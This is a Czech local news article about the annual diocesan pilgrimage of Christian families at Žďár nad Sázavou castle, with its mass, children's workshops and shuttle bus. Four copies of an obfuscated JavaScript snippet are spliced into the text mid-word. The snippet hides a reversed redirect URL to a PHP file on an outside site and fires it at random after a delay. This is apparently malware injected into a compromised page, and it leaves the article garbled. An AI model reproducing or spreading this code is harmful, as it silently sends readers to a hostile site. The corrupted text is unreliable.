Rainbow page separator

První sobotu v září do Žďáru opět zavítají křesťanské rodiny

Pondělí, 28. srpna 2017

Národní pouť rodin 2014

Žďár nad Sázavou / V pořadí už 14. diecézní pouť rodin se v sobotu 2. září uskuteční v areálu žďárského zámku. Le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos je rovněž spojená s připomínkou 240. výročí založení brněnské diecéze.
Tradiční akce, která do Žďáru každým rokem přiláká s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovky křesťanských rodin z celé republiky, začne duchovním slovem deset minut před půl desá[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou, v deset hodin se pak na hlavním pódiu odehraje tradiční mše svatá, již celebruje brněnský diecézní biskup Vojtěch Cikrle. Pro rodiče i děti bude opět připravený pestrý program, který zahrne například výtvarné dílny pro nejmenší, divadelní a hudební vys[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toupení, tematická zastavení, akce pro mládež či přednášky určené dospělým. Na pouť rodin se vztahuje i zvýhodněné vstupné v zámeckém Muzeu nové generace.
Pro maminky s nejmenšími dětmi bude v areálu opět k dispozici místnost pro kojení i přebalování a mezi zámkem a nádražím bude před začátkem a po konci poutě rodin jezdit kyvadlová doprava.